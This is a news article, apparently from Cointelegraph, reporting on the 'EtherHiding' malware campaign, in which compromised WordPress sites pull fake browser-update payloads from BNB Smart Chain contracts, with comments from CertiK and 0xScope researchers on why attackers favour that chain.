Despite the name “EtherHiding,” the new attack vector that hides malicious code in blockchain smart contracts has little to do with Ethereum at all, cybersecurity analysts have revealed.
As reported by Cointelegraph on October 16, EtherHiding was discovered as a new way for bad actors to hide malicious payloads inside smart contracts, with the ultimate goal of distributing malware to unsuspecting victims.
These cybercriminals tend to prefer using Binance’s BNB Smart Chain, it is understood.
Speaking to Cointelegraph, security researcher at blockchain security firm CertiK, Joe Green, said that most of this is due to the lower costs of BNB Smart Chain:
“The handling fee of BSC is much cheaper than that of ETH, but the network stability and speed are the same because every update of JavaScript Payload is very cheap, it means there is no financial pressure.”
EtherHiding attacks are initiated by hackers compromising WordPress websites and injecting code that pulls partial payloads buried in Binance smart contracts. The front end of the website is replaced by a fake update browser which, when clicked, pulls the JavaScript payload from the Binance blockchain.
The actors often change the malware payloads and update website domains to avoid detection. This allows them to continuously serve users fresh malware downloads disguised as browser updates, Green explained.
Another reason, according to security researchers at Web3 analytics firm 0xScope, could be due to increased security-related scrutiny on Ethereum.
“While we will likely never know the true motives of the EtherHiding hacker for using BNB Smart Chain over other blockchains for their scheme, one possible factor is the increased security scrutiny on Ethereum.”
Hackers may face higher risks of detection by injecting their malicious code using Ethereum because of systems like Infura’s IP address tracking for MetaMask transactions, they said.
Related: Crypto investors under attack by new malware, Cisco Talos reveals
The 0xScope team told Cointelegraph that they recently traced the flow of money between hacked addresses on BNB Smart Chain and Ethereum.
Key addresses were linked to NFT market OpenSea users and Copper custody services, it reported.
Payloads were updated daily across 18 identified hacker domains. This sophistication makes EtherHiding difficult to detect and stop, the company concluded.
Magazine: Should crypto projects ever negotiate with hackers? Probably